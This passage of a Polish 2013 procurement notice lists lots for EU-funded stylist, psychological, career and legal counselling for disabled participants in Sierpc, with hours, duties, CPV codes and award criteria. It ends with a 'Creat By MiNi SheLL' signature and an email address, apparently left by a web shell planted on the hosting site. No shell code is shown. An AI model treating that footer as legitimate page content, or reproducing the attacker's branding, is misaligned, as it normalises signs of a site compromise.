Dokonania wpisu o szkoleniu/doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym.

Zakres warsztatów terapeutycznych:
trening zastępowania agresji
trening twórczego myślenia,
asertywność
profilaktyka uzależnień.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konsultacje indywidualne i spotkania warsztatowe z wizażystą/ stylistą w ramach projektu Praca - trzeba działać a nie czekać - 90 godzin, akademia wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 30 uczestników (100% z niepełnosprawnością). 
Rok 2013:  30uczestników*2godziny konsultacji indywidualnych na 1 osobę = 60 godzin 
Spotkania warsztatowe 2013: 2 grupy*15h dla 1 grupy=30godzin 

Obowiązki Wykonawcy: 
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia lub dyplomu lub certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji, ostateczne opinie, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
Dokonania wpisu o szkoleniu lub doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym.
pomoc w skompletowaniu stroju na rozmowę kwalifikacyjną (wspólne zakupy stylisty/wizażysty z uczestnikiem i pracownikiem socjalnym)
dokumentacja zdjęciowa (przed i po zabiegach estetycznych), prezentacja multimedialna na płycie CD = wydruk 50 folderów pn.: METAMORFOZY -promocja efektów działań

Zakres warsztatów i poradnictwa indywidualnego:
poprawa autoprezentacji
typy kolorystyczne, typy sylwetki, kolorystyka garderoby, dobór makijażu i fryzury, tworzenie indywidualnego stylu
zabiegi poprawiające wygląd - fryzjer, kosmetyczka: dobór fryzury, strzyżenie, malowanie, dobranie ubioru inne zabiegi pod nadzorem wizażysty lub stylisty.

Czas realizacji zamówienia: od podpisania umowy do grudnia 2013r. 
Miejsce świadczenia usług: Sierpc
Wyżywienie (zajęcia warsztatowe): catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Dośwadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Poradnictwo psychologiczne dla 20 uczestników projektu Asystent Osoby Niepełnosprawnej - realna pomoc i wsparcie - 100 godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20 uczestników (100% z niepełnosprawnością). 
Rok 2013:  20 uczestników*średnio 1 godzina konsultacji indywidualnych na 1 osobę = 20 godzin. Czerwiec-lipiec 2013r.
Spotkania warsztatowe 2013: 2 grupy*30h dla 1 grupy=60godzin, Czerwiec-lipiec 2013r.
Pomoc psychologa w ramach grup wsparcia 10 x 2 godziny = 20 godzin  sierpień - grudzień 2013r.                                  
Miejsce: Sierpc, siedziba Zamawiającego
Kod Wspólnotowego Słownika Zamówień:   (CPV) - 85121270-6 Usługi psychiatryczne lub psychologiczne
Harmonogram: konsultacje indywidualne od poniedziałku do soboty, 
(grafik dostosowany do preferencji i możliwości uczestników, ze szczególnym uwzględnieniem potrzeb osób niepełnosprawnych), spotkania grupowe 4-6 godzinne,
Wyżywienie: catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto)

Celem poradnictwa psychologicznego jest: trening kompetencji i umiejętności społecznych, wsparcie rozwoju osobistego a także kształtowanie umiejętności komunikacji interpersonalnej.
Zakres poradnictwa psychologicznego:
Autoprezentacja,
komunikacja interpersonalna z elementami asertywności, 
kreatywność i nastawienie do zmian,
trening twórczego myślenia,
metody radzenia sobie ze stresem i przezwyciężania problemów życiowych, zwłaszcza ograniczeń związanych z niepełnosprawnością,
zwiększenie poczucia wpływu na własne życie i możliwości dokonywania świadomych wyborów,
wzmocnienie samooceny i poczucia własnej wartości, 
nauka stawiania sobie celów i sposobów ich realizacji,
nauka zarządzania czasem, trening interpersonalny,
zagadnienia istniejących stereotypów i równości płci, praca w zespole
inne elementy uznane przez Wykonawcę za istotne.

Obowiązki Wykonawcy:
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia/dyplomu/certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji, opinie, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przygotowanie w porozumieniu z doradcą zawodowym indywidualnych planów działania dla uczestników;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
Dokonania wpisu o szkoleniu/doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Doradztwo zawodowe  dla 20 uczestników projektu Asystent Osoby Niepełnosprawnej - realna pomoc i wsparcie - 60 godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20 uczestników (100% z niepełnosprawnością). Rok 2013:  20uczestników*1godzina konsultacji indywidualnych na 1 osobę = 20 godzin. 
Spotkania warsztatowe 2013: 2 grupy*20h dla 1 grupy=40godzin
Termin: maj-czerwiec 2013r.
Miejsce: Sierpc, siedziba Zamawiającego
Kod Wspólnotowego Słownika Zamówień:   CPV 85312320-8 Usługi doradztwa
Harmonogram: konsultacje indywidualne od poniedziałku do soboty, 
(grafik dostosowany do preferencji i możliwości uczestników, ze szczególnym uwzględnieniem potrzeb osób niepełnosprawnych), spotkania grupowe 4-6 godzinne,
Wyżywienie: catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto)
Celem szkolenia indywidualnego jest określenie ścieżki rozwoju zawodowego uczestników projektu, poprzez wypracowanie IPD (Indywidualnego Planu Działania). 
IPD powinien zawierać:
diagnozę stanu wyjściowego, rozpoznanie oczekiwań i potrzeb uczestnika projektu w tym m.in. przebieg kariery edukacyjno-zawodowej (wykształcenie, szkolenie, doświadczenie zawodowe), zainteresowania uczestnika projektu; 
określenie trudności zawodowych, rozpoznanie celów zawodowych;
strategię działania określającą szczegółowy sposób realizacji założonych celów zawodowych. 
Cele grupowego doradztwa zawodowego (Trening Pracy):
omówienie technik i aktywnych metod poszukiwania pracy, alternatywne formy zatrudnienia, elastyczne godziny pracy
trening motywacji
nauka skutecznego i aktywnego poszukiwania pracy
proces wytyczania celów i priorytetów
zasady przygotowania dokumentów aplikacyjnych 
przygotowanie do rozmowy kwalifikacyjnej
nauka zasad autoprezentacji i komunikacji podczas rozmowy kwalifikacyjnej
metody radzenia sobie ze stresem
warsztaty Savoir Vivre w kontakcie z pracodawcą i współpracownikami
inne elementy uznane przez Wykonawcę za istotne, z uwzględnieniem perspektywy niepełnosprawności.
Obowiązki Wykonawcy:
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia/dyplomu/certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji, ostateczne opinie, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przygotowanie w porozumieniu z psychologiem indywidualnych planów działania dla uczestników;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
Dokonania wpisu o szkoleniu/doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupowe warsztaty prawnicze 
dla uczestników projektu: 
AON - realna pomoc i wsparcie

20 GODZIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> AON - 20 uczestników (100% z niepełnosprawnością). 
Rok 2013:  Spotkania warsztatowe: 1 grupa*20h =20godzin    

Czas realizacji zamówienia: od podpisania umowy do grudnia 2013r. 
Miejsce świadczenia usług: siedziba Zamawiającego
Wyżywienie: catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto)

Obowiązki Wykonawcy: 
dokumentowanie własnej pracy: karty czasu pracy, listy obecności, ewidencja udzielonych konsultacji,
prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Harmonogram: spotkania grupowe 4-6 godzinne, 
dokonanie wpisu o doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym.

Zakres poradnictwa prawnego:
aspekty prawne funkcjonowania Asystenta osób niepełnosprawnych
uprawnienia i świadczenia przysługujące osobom niepełnosprawnym i ich rodzinom,
możliwości leczenia , rehabilitacji i edukacji osób 
z niepełnosprawnością,
prawo pracy, 
obowiązki pracodawcy i pracownika, 
Savoir-vivre w biznesie, 
podstawy prawa gospodarczego i cywilnego,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Warsztaty psychologiczne w zakresie umiejętności korzystania z usług Asystentów osób niepełnosprawnych - 60 godzin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lata 2013-2014 - 20 uczestników (100% z niepełnosprawnością). 
Spotkania warsztatowe 2013: 30godzin                                                     
Spotkania warsztatowe 2014: 30godzin 
Termin:  lipiec-grudzień 2013 r., styczeń-czerwiec 2014r.
Miejsce: Sierpc, siedziba Zamawiającego
Kod Wspólnotowego Słownika Zamówień:   (CPV) - 85121270-6 Usługi psychiatryczne lub psychologiczne
Wyżywienie: catering zapewniony przez Zamawiającego (kawa, herbata, kanapki, ciasto)

Celem poradnictwa psychologicznego jest: trening kompetencji i umiejętności społecznych, wsparcie rozwoju osobistego a także kształtowanie umiejętności komunikacji interpersonalnej.

Obowiązki Wykonawcy:
Przygotowanie ramowego programu (konspektu) zajęć;
Oznakowanie Sali zgodnie z zasadami dot. promocji projektów finansowanych ze środków EFS;
Wystawienie każdemu uczestnikowi zaświadczenia/dyplomu/certyfikatu;
Dokumentowanie własnej pracy: karty czasu pracy, listy obecności, zdjęcia;
Prowadzenie konsultacji wg ustalonego z koordynatorem projektu harmonogramu;
Przekazanie każdemu uczestnikowi niezbędnych materiałów i pomocy dydaktycznych właściwie oznakowanych logotypami;
Dokonania wpisu o szkoleniu/doradztwie specjalistycznym na stronie www.inwestycjewkadry.info.pl w terminie przewidzianym w umowie 
z Zamawiającym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com